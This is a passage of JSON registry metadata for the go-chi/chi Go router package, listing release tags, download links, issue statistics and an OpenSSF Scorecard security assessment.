ags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.229Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42444926529425825,"forks_count":0.6257877057855061,"average":4.348809308704352},"purl":"pkg:golang/gopkg.in/go-chi/chi.v2","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/gopkg.in/go-chi/chi.v2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/gopkg.in/go-chi/chi.v2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/gopkg.in/go-chi/chi.v2/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v2/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":8248670,"name":"github.com/go-chi/chi/v2","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"github.com/go-chi/chi","versions_count":3,"first_release_published_at":"2023-09-08T04:32:48.785Z","latest_release_published_at":"2023-09-08T04:32:48.785Z","latest_release_number":"v2.1.0","last_synced_at":"2026-08-12T02:06:18.969Z","created_at":"2023-09-08T04:32:44.585Z","updated_at":"2026-08-12T02:06:18.969Z","registry_url":"https://pkg.go.dev/github.com/go-chi/chi/v2","install_command":"go get github.com/go-chi/chi/v2","documentation_url":"https://pkg.go.dev/github.com/go-chi/chi/v2#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5